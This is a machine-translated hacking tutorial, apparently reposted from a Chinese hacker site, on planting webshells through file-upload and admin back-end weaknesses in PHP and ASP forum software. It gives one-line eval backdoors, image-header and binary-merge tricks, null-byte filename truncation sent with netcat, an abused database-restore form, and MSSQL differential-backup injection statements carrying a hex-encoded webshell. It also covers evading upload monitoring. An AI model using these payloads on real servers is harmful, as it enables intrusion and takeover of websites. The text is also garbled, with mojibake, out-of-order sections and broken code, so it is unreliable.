Uploading pictures several ways the shell bypasses filtering

General site image upload function to filter files to prevent webshelll write. But different programs for filtering is not the same, how to break through the filter to continue uploading?

This article summarizes seven ways, can break through!

1, the file head +gif89a method. (PHP)//This is very well understood, directly at the top of the PHP horse written gif89a, and then upload dama.php

2. Use the Edjpgcom tool to inject code into the image. (PHP)//edjpgcom modified, add PHP to save as a sentence dama.php

3, cmd command under copy image. gif+shell.php webshell.php (PHP)//Estimate and 1 are the same principle, cheat upload webshell.php

4, C32asm Open the picture at the end of the file empty one block add code <?php eval ($_post[cmd])?>. (PHP)//populate PHP with a sentence and upload it.

5. Improve the Code <?php fputs (fopen ("error.php") on the basis of 4. W ")." <?eval (\$_post[cmd]);? > ")?>. (PHP)//With

Directory generated error.php, question: How to rewrite the ASP?

Answer: The result of ASP test is: No permissions ...

<%

Set myfileobject=server.createobject ("Scripting.FileSystemObject")

Set mytextfile=myfileobject.createtextfile ("kafei.asp")

Mytextfile.writeline ("\<\%eval request" (CHR) \%\>)

Mytextfile.close

%>

6, IIS resolves directory name vulnerability 1.php;. JPG (jpg)//This is the file name variable is not filtered.

7, NC Packet modification data//path name and file name is not filtered.

Modify the upload path through the/upload/1.asp+ space, using the software to fill the space with 00. Then NC commits to get Webshell.

Waiting to be added ...

1, a local MDB database was built, write
┼ disruptively 畣 Whole choky Longoza enemy Kozasa ∨≡┩ 愾
2, and then to ASP upload, a word trojan upload success, and then take the client to connect, came out of the first-class monitoring system tips
It's also a thing to estimate that the front shell is empty.
The first is to encrypt your shell with Microsoft's Screnc.exe.
3, then create a small picture.
Under cmd copy/b a.jpg+shell.asp rs.asp
Merge two files together using a binary approach. This time again upload, success, not by the monitoring system block down.
4, but at this time the shell to be under the Firefox can browse, put in IE under the words will only to a picture, and can't see the shell.
Because the shell and the picture in front of the merge together, so there are a lot of garbage in the shell, this time using the Shell remote file download function.
Because the first-class monitoring system will only check the uploaded data, the data downloaded from the server will not be detected.
Download a clean shell to the server, then save the shell as a txt file and then upload it to your server, and then use the remote file download provided by the shell to download the TXT file to the server and save it as ASP, so you get a clean shell.

================================================

The upload vulnerability is mainly the use of the ' \ S ' character vulnerability, ' \ s ' character is used in the system as a sign of the end of the string
The basic principle is that the network program prohibits the uploading of. asp and other suffix files, but it will allow uploading of. jpg or. gif format files.
This way, if you construct the packet formpath=uploadfile/shell.asp '. jpg ', then the character after ' \ S ' will be truncated because the computer encounters the ' \ S ' character and thinks the string is over. So we uploaded a server named shell.asp ASP Trojan program, the following is not much to say, Webshell function is very powerful, if you cooperate with Serv-u get the administrator permissions of the server ...

Intrusion process:
Condition: Requires at least NC, WinSock Expert, ultraedit three tools and a Webshell program
Nc.exe (NETCAT)-a distorted telnet, sniffer, cyber security saber!
WinSock Expert-Grab kit to intercept traffic on network traffic
UltraEdit-... No, no one knows no one-_-!
Webshell-asp, PHP and other Trojan programs

1. The first step, open the target system upload page, through the Winsock expert monitoring, upload the webshell.asp file, and then open the Winsock expert, the intercepted data stream to save as a text file
(All content under two send, including blank lines generated by carriage return)

2. Modify the key code in the text file by UltraEdit: Filename= "C:\test\webshell.asp", Webshell.asp after add: 1 spaces and. jpg, then jump to 16 edit state, modify 16 in the space of 20 for 00,content-length length increased 5. (one character counts one byte, '. jpg ' one 5 bytes)

3.NC appearances! ^^
directive: NC-VV www.xxx.com < 1.txt

Get the complete Web shell in the background

Today brings everyone is some technical summary, some people always ask experience how to come, this is experience, I hope everyone can become a script master.
Online transmission of loopholes, I believe that we have won many chickens. It can be said that the network to let upfile.asp upload file filtering vulnerability starkly the world, now this loophole has been basically more difficult to see, do not rule out some small sites still exist this vulnerability. In the process of taking the station, we often cost nine cows two tigers to get the administrator account and password, and smoothly into the backstage, although at this time and get the site Webshell still a step away, but there are many novice because can't think of the right way to be rejected. Therefore, we used to get Webshell from the backstage method to summarize and generalize, the general situation has the following ten aspects.
Note: How to enter the background, not the scope of this article, its specific methods do not say, rely on everyone to play their own. This article refers to the various predecessors of the information and information, together, thank you.
First, direct upload to get Webshell
This kind of PHP and JSP some programs are more common, Molyx board is one example, directly in the mood icon management upload. PHP type, although no hint, in fact has succeeded, upload the file URL should be http://forums/images/smiles/under , a few years ago, the joint audience game Station and NetEase JSP System vulnerability can directly upload JSP files. FileName is the original file name, Bo-blog background can be directly uploaded. php files, upload the file path is prompted. And a year ago very popular upfile.asp loopholes (dynamic Nets 5.0 and 6.0, many of the early whole station system), because the filter upload file is not strict, so that users can directly upload Webshell to the site any writable directory, so as to get the site administrator control permissions.
Second, add the modified upload type
Now many of the script upload module is not only allowed to upload legitimate file types, and most of the system is allowed to add upload type, bbsxp background can add ASA ASP type, Ewebeditor background can also add ASA type, After the modification we can upload the ASA suffix Webshell directly, there is a situation is filtered. asp, you can add. aspasp file types to upload to get Webshell. In the background of the PHP system, we can add the. php.g1f upload type, which is a feature of PHP, the last of which as long as it is not known file type, PHP will php.g1f as. php to run normally, so it can also successfully get the shell. LeadBbs3.14 backstage Get Webshell method is: In the upload type add ASP, notice, ASP behind there is a space, and then upload ASP horse in the foreground, of course, also to add a space in the back! Vii. Asp+mssql System
Here you need to mention a little mobile version of the MSSQL, but can be directly submitted to the local backup. First upload a fake image with ASP code in the post, and then remember its upload path. Write a locally submitted form with the following code:
<form Act ion=http://website/bbs/admin_data.asp?ac tion=restoredata&act=restore method= "POST" >
<p> Location of uploaded files: <input name= "Dbpath" type= "text" size= "+" > </p>
<p> Location to copy to: <input name= "Backpath" type= "text" size= "up" > </p>
<p> <input type= "Submit" value= "commit" > </p> </form>
Save As. htm for local execution. Put the fake image upload path in the "location of uploaded files" there, the relative path of the Webshell that you want to back up is filled in the "Where to copy to", the submission will get our lovely Webshell, the recovery code and similar, modify the relevant place is OK. Did not encounter the background to perform MSSQL command more powerful ASP program background, dynamic network database Restore and backup is a device, can not execute SQL command backup Webshell, can only execute some simple query commands. MSSQL can be used to inject differential backup Webshell, the general background is to show the absolute path, as long as the injection point can basically be a differential backup success. The following is the main statement code of differential backup, using the injection vulnerability of the dynamic Network 7.0 can be used to backup a Webshell, you can use the above mentioned method, the conn.asp file backup to a. txt file for the library name.
Main code for differential backups:
;d eclare @a sysname,@s varchar (4000) Select @a=db_name (), @s=0x626273 Backup Database @a to [email protected]
;D ROP Table [heige];create table [dbo]. [Heige] ([cmd] [image])--
Insert into Heige (cmd) VALUES (0x3c2565786563757465207265717565737428226c2229253e)--
;d eclare @a sysname,@s varchar (4000) Select @a=db_name (), @s=0x643a5c7765625c312e617370 Backup Database @a to [email prote CTED] with differential,format--
In this code, 0x626273 is the name of the library to be backed up in hexadecimal, can be other names such as Bbs.bak; 0X3C2565786563757465207265717565737428226C2229253E is the hex of <%execute request ("L")%>, which is the LP min ma 0X643A5C7765625C312E617370 is the hexadecimal of d:\web\1.asp, which is the Webshell path you want to back up. Of course, you can use more common backup method to obtain Webshell, the only disadvantage is that the backup file is too large, if the backup database has anti-download data table, or have the wrong ASP code, the backup of the Webshell will not run successfully, using differential backup is a relatively high success rate method, and greatly reduce the size of backup files.
Viii. Php+mysql System
The background needs to have MySQL data query function, we can use it to execute SELECT ... into outfile query output PHP file, because all the data is stored in MySQL, so we can through the normal means to put our Webshell code into MySQL in the use of select ... into outfile statement to export the shell.
Can be out of the path, PHP environment is more prone to burst out absolute path:). The point is that the encounter is MySQL in the win system under the path should be written like this. The following method is a common method of exporting Webshell, you can also write a VBS add system administrator's script to export to the Startup folder, the system will be re-added an administrator account
Will be in the up directory to generate a file named saiy.php content of the smallest PHP trojan, and finally with the Lanker client to connect. In practice, consider whether the folder has write permissions. Or enter such code will generate a a.php of the smallest horse in the current directory.
Nine, Phpwind Forum from backstage to the Webshell three ways
Mode 1 Template Method
Into the background, style template settings, in a random line to write code, remember, this code must be on the left side of the line to write, the code can not be preceded by any characters.
Tenor 2 Profanity Filter method
Mode 3 User Level management
The above three ways to get Webshellr password is a, for lanker a word back door server.
Ten, can also use the website Access count system record to obtain Webshell
Solution Solutions
Because this article involves a lot of code versions, it is not possible to provide a perfect solution. The ability to correct the vulnerability file mentioned herein, if the vulnerability file does not affect system use can also delete this file. If you do not repair, you can go to the relevant official website to download the latest patches to repair the update. At the same time, you can always pay attention to the major security network released the latest announcements, if you find the relevant loopholes can also be timely notify the official website.
Postscript
In fact, from the backstage to get Webshell skills should still have a lot of, the key is to see how flexible use, comprehend by analogy, hope this method can play a role. Come on, let's control the server to the end!
Third, use the background management function to write Webshell
The upload vulnerability basically complements the same, so we enter the background can also be modified by the relevant files to write Webshell. Compared with the typical dvbbs6.0, there are leadbbs2.88, and so on, directly in the background to modify the configuration file, write suffix is the ASP file. and LeadBbs3.14 backstage to get Webshell another way is: Add a new link, in the site name written on the ice fox the smallest horse can, the smallest horse to enter some words casually before and after
, http:\\ website \inc\inchtm\boardlink.asp is the shell we want.
Iv. using background management to write Webshell to the configuration file
Using symbols such as "" "" "" ":" "//" to construct the configuration file of the minimum horse writing program, Joekoe Forum, XXX Yearbook, boiling Outlook News system, COCOON counter statistical program, etc., there are many PHP programs can, COCOON counter statistical procedures for example, Add [email protected] to the management mailbox: eval request (Chr (35))//, in the configuration file is webmail= "[Email protected]\": eval request (Chr (35))//", Another way is to write [email protected] "%><%eval request (Chr (35))%><% ', so that it will be formed before and after the corresponding, the smallest horse also run. <%eval Request (Chr (35))%> can be connected with the lake2 of the Eval sender and the latest 2006 clients, it needs to be explained that the database is to be selected when the horse is inserted. Again like moving Easy 2005, to the article Center management-top Menu Settings-menu Other effects, insert a word horse "%><%execute request (" L ")%><% ', Save the top column menu parameters set successfully, we will get the horse address http://website/admin/ Rootclass_menu_config.asp.
V. Using back-Office database backup and recovery to get Webshell
Mainly use the background to the Access database "backup Database" or "RESTORE Database" function, "Backup database path" and other variables are not filtered resulting in the arbitrary file suffix can be changed to ASP, so that the Webshell,msssql version of the program directly applies the access version of the code, Causes the SQL version to still be available. You can also back up your Web site ASP files to other suffixes such as. txt files so that you can view and get the Web page source code, and get more program information to increase your chances of getting webshell. In the actual application often encounter no upload function, but there is an ASP system in operation, using this method to view the source code to get its database location, for the database plug the horse to create opportunities, the dynamic Network forum has an IP address database, In the background of IP management can be inserted into the smallest horse and then back up to. asp files. In the breakthrough upload detection method, many ASP programs even after the suffix is changed to indicate that the file is illegal, by the. asp file header plus gif89a modify the suffix to GIF to deceive the ASP program to achieve the purpose of uploading, there is also a notepad to open the image file, paste part of the copy to the ASP Trojan file header, modified GIF suffix upload can also break through detection, and then back up as. asp file, successfully get Webshel L
Vi. use of database compression function
Can be the data to prevent download failure so that the smallest inserted database to run successfully, the more typical is the Loveyuki l-blog, in the URL of friendship added <%eval request (Chr (35))%>, after submission, in the database operations to compress the database, You can successfully compress the. asp file, using the ocean's smallest horse's eval client connection to get a webshell.
This article is from the New Century network Ann Base (www.520hack.com) Source: http://www.520hack.com/Article/Text2/200911/16637.html

Uploading pictures several ways the shell bypasses filtering